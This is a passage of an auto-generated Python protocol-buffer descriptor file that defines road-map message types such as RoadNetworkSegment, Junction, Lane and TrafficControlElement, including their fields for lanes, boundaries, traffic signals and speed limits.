number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='end_node', full_name='pb.lyft.maps.RoadNetworkSegment.end_node', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='forward_lane_set', full_name='pb.lyft.maps.RoadNetworkSegment.forward_lane_set', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='backward_lane_set', full_name='pb.lyft.maps.RoadNetworkSegment.backward_lane_set', index=4,
number=13, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='num_bidirectional_lanes', full_name='pb.lyft.maps.RoadNetworkSegment.num_bidirectional_lanes', index=5,
number=15, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='lanes', full_name='pb.lyft.maps.RoadNetworkSegment.lanes', index=6,
number=12, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='name', full_name='pb.lyft.maps.RoadNetworkSegment.name', index=7,
number=5, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='road_class', full_name='pb.lyft.maps.RoadNetworkSegment.road_class', index=8,
number=6, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='is_private', full_name='pb.lyft.maps.RoadNetworkSegment.is_private', index=9,
number=14, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='is_toll_road', full_name='pb.lyft.maps.RoadNetworkSegment.is_toll_road', index=10,
number=17, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='travel_direction', full_name='pb.lyft.maps.RoadNetworkSegment.travel_direction', index=11,
number=7, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='z_level', full_name='pb.lyft.maps.RoadNetworkSegment.z_level', index=12,
number=8, type=17, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='speed_limit_meters_per_second', full_name='pb.lyft.maps.RoadNetworkSegment.speed_limit_meters_per_second', index=13,
number=9, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='backward_direction_speed_limit_meters_per_second', full_name='pb.lyft.maps.RoadNetworkSegment.backward_direction_speed_limit_meters_per_second', index=14,
number=10, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='restrictions', full_name='pb.lyft.maps.RoadNetworkSegment.restrictions', index=15,
number=11, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='driveable', full_name='pb.lyft.maps.RoadNetworkSegment.driveable', index=16,
number=20, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='walkable', full_name='pb.lyft.maps.RoadNetworkSegment.walkable', index=17,
number=21, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='forward_bikeable', full_name='pb.lyft.maps.RoadNetworkSegment.forward_bikeable', index=18,
number=23, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='backward_bikeable', full_name='pb.lyft.maps.RoadNetworkSegment.backward_bikeable', index=19,
number=24, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[_ROADNETWORKSEGMENT_LANESET, ],
enum_types=[
_ROADNETWORKSEGMENT_ROADCLASS,
_ROADNETWORKSEGMENT_TRAVELDIRECTION,
_ROADNETWORKSEGMENT_SIDEOFSEGMENT,
_ROADNETWORKSEGMENT_BIKEACCESS,
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1157,
serialized_end=3325,
)
_JUNCTION = _descriptor.Descriptor(
name='Junction',
full_name='pb.lyft.maps.Junction',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='is_non_trivial_intersection', full_name='pb.lyft.maps.Junction.is_non_trivial_intersection', index=0,
number=4, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='road_network_nodes', full_name='pb.lyft.maps.Junction.road_network_nodes', index=1,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='lanes', full_name='pb.lyft.maps.Junction.lanes', index=2,
number=3, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='traffic_control_elements', full_name='pb.lyft.maps.Junction.traffic_control_elements', index=3,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=3328,
serialized_end=3524,
)
_LANE_BOUNDARY = _descriptor.Descriptor(
name='Boundary',
full_name='pb.lyft.maps.Lane.Boundary',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='vertex_deltas_x_cm', full_name='pb.lyft.maps.Lane.Boundary.vertex_deltas_x_cm', index=0,
number=1, type=17, cpp_type=1, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='vertex_deltas_y_cm', full_name='pb.lyft.maps.Lane.Boundary.vertex_deltas_y_cm', index=1,
number=2, type=17, cpp_type=1, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='vertex_deltas_z_cm', full_name='pb.lyft.maps.Lane.Boundary.vertex_deltas_z_cm', index=2,
number=3, type=17, cpp_type=1, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='divider_type', full_name='pb.lyft.maps.Lane.Boundary.divider_type', index=3,
number=4, type=14, cpp_type=8, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='type_change_point_cm', full_name='pb.lyft.maps.Lane.Boundary.type_change_point_cm', index=4,
number=5, type=5, cpp_type=1, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
_LANE_BOUNDARY_DIVIDERTYPE,
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=4292,
serialized_end=4790,
)
_LANE = _descriptor.Descriptor(
name='Lane',
full_name='pb.lyft.maps.Lane',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='parent_segment_or_junction', full_name='pb.lyft.maps.Lane.parent_segment_or_junction', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='access_restriction', full_name='pb.lyft.maps.Lane.access_restriction', index=1,
number=11, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='orientation_in_parent_segment', full_name='pb.lyft.maps.Lane.orientation_in_parent_segment', index=2,
number=12, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='turn_type_in_parent_junction', full_name='pb.lyft.maps.Lane.turn_type_in_parent_junction', index=3,
number=13, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='geo_frame', full_name='pb.lyft.maps.Lane.geo_frame', index=4,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='left_boundary', full_name='pb.lyft.maps.Lane.left_boundary', index=5,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='right_boundary', full_name='pb.lyft.maps.Lane.right_boundary', index=6,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='lanes_ahead', full_name='pb.lyft.maps.Lane.lanes_ahead', index=7,
number=5, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='adjacent_lane_change_left', full_name='pb.lyft.maps.Lane.adjacent_lane_change_left', index=8,
number=6, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='adjacent_lane_change_right', full_name='pb.lyft.maps.Lane.adjacent_lane_change_right', index=9,
number=7, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='traffic_controls', full_name='pb.lyft.maps.Lane.traffic_controls', index=10,
number=8, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='yield_to_lanes', full_name='pb.lyft.maps.Lane.yield_to_lanes', index=11,
number=9, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='can_have_parked_cars', full_name='pb.lyft.maps.Lane.can_have_parked_cars', index=12,
number=10, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='tolls', full_name='pb.lyft.maps.Lane.tolls', index=13,
number=14, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[_LANE_BOUNDARY, ],
enum_types=[
_LANE_TURNTYPE,
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=3527,
serialized_end=4894,
)
_TRAFFICCONTROLELEMENT_PEDESTRIANCROSSWALK = _descriptor.Descriptor(
name='PedestrianCrosswalk',
full_name='pb.lyft.maps.TrafficControlElement.PedestrianCrosswalk',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='traffic_lights', full_name='pb.lyft.maps.TrafficControlElement.PedestrianCrosswalk.traffic_lights', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='yield_lines', full_name='pb.lyft.maps.TrafficControlElement.PedestrianCrosswalk.yield_lines', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=9669,
serialized_end=9783,
)
_TRAFFICCONTROLELEMENT_AUXILIARYELEMENT = _descriptor.Descriptor(
name='AuxiliaryElement',
full_name='pb.lyft.maps.TrafficControlElement.AuxiliaryElement',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='primary_traffic_control_elements', full_name='pb.lyft.maps.TrafficControlElement.AuxiliaryElement.primary_traffic_control_elements', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=9785,
serialized_end=9869,
)
_TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE_YIELDSET = _descriptor.Descriptor(
name='YieldSet',
full_name='pb.lyft.maps.TrafficControlElement.TrafficLightFaceState.YieldSet',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='lane', full_name='pb.lyft.maps.TrafficControlElement.TrafficLightFaceState.YieldSet.lane', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='yield_to_lanes', full_name='pb.lyft.maps.TrafficControlElement.TrafficLightFaceState.YieldSet.yield_to_lanes', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='yield_to_crosswalks', full_name='pb.lyft.maps.TrafficControlElement.TrafficLightFaceState.YieldSet.yield_to_crosswalks', index=2,
number=3, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=10025,
serialized_end=10174,
)
_TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE = _descriptor.Descriptor(
name='TrafficLightFaceState',
full_name='pb.lyft.maps.TrafficControlElement.TrafficLightFaceState',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='yield_rules_when_on', full_name='pb.lyft.maps.TrafficControlElement.TrafficLightFaceState.yield_rules_when_on', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='no_right_turn_on_red', full_name='pb.lyft.maps.TrafficControlElement.TrafficLightFaceState.no_right_turn_on_red', index=1,
number=2, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[_TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE_YIELDSET, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=9872,
serialized_end=10174,
)
_TRAFFICCONTROLELEMENT_TRAFFICLIGHT = _descriptor.Descriptor(
name='TrafficLight',
full_name='pb.lyft.maps.TrafficControlElement.TrafficLight',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='face_states', full_name='pb.lyft.maps.TrafficControlElement.TrafficLight.face_states', index=0,
number=3, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=10176,
serialized_end=10235,
)
_TRAFFICCONTROLELEMENT = _descriptor.Descriptor(
name='TrafficControlElement',
full_name='pb.lyft.maps.TrafficControlElement',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='stop_sign', full_name='pb.lyft.maps.TrafficControlElement.stop_sign', index=0,
number=7, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='yield_sign', full_name='pb.lyft.maps.TrafficControlElement.yield_sign', index=1,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='stop_line', full_name='pb.lyft.maps.TrafficControlElement.stop_line', index=2,
number=47, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='traffic_light', full_name='pb.lyft.maps.TrafficControlElement.traffic_light', index=3,
number=29, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='signal_flashing_yellow', full_name='pb.lyft.maps.TrafficControlElement.signal_flashing_yellow', index=4,
number=9, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='signal_flashing_red', full_name='pb.lyft.maps.TrafficControlElement.signal_flashing_red', index=5,
number=10, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='signal_red_face', full_name='pb.lyft.maps.TrafficControlElement.signal_red_face', index=6,
number=11, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='signal_yellow_face', full_name='pb.lyft.maps.TrafficControlElement.signal_yellow_face', index=7,
number=12, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='signal_green_face', full_name='pb.lyft.maps.TrafficControlElement.signal_green_face', index=8,
number=13, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='signal_left_arrow_red_face', full_name='pb.lyft.maps.TrafficControlElement.signal_left_arrow_red_face', index=9,
number=30, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='signal_left_arrow_yellow_face', full_name='pb.lyft.maps.TrafficControlElement.signal_left_arrow_yellow_face', index=10,
number=36, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='signal_left_arrow_green_face', full_name='pb.lyft.maps.TrafficControlElement.signal_left_arrow_green_face', index=11,
number=31, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='signal_right_arrow_red_face', full_name='pb.lyft.maps.TrafficControlElement.signal_right_arrow_red_face', index=12,
number=32, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='signal_right_arrow_yellow_face', full_name='pb.lyft.maps.TrafficControlElement.signal_right_arrow_yellow_face', index=13,
number=37, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='signal_right_arrow_green_face', full_name='pb.lyft.maps.TrafficControlElement.signal_right_arrow_green_face', index=14,
number=33, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='signal_upper_left_arrow_red_face', full_name='pb.lyft.maps.TrafficControlElement.signal_upper_left_arrow_red_face', index=15,
number=38, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='signal_upper_left_arrow_yellow_face', full_name='pb.lyft.maps.TrafficControlElement.signal_upper_left_arrow_yellow_face', index=16,
number=39, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='signal_upper_left_arrow_green_face', full_name='pb.lyft.maps.TrafficControlElement.signal_upper_left_arrow_green_face', index=17,
number=40, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='signal_upper_right_arrow_red_face', full_name='pb.lyft.maps.TrafficControlElement.signal_upper_right_arrow_red_face', index=18,
number=41, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='signal_upper_right_arrow_yellow_face', full_name='pb.lyft.maps.TrafficControlElement.signal_upper_right_arrow_yellow_face', index=19,
number=42, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='signal_upper_right_arrow_green_face', full_name='pb.lyft.maps.TrafficControlElement.signal_upper_right_arrow_green_face', index=20,
number=43, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='signal_red_u_turn', full_name='pb.lyft.maps.TrafficControlElement.signal_red_u_turn', index=21,
number=44, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
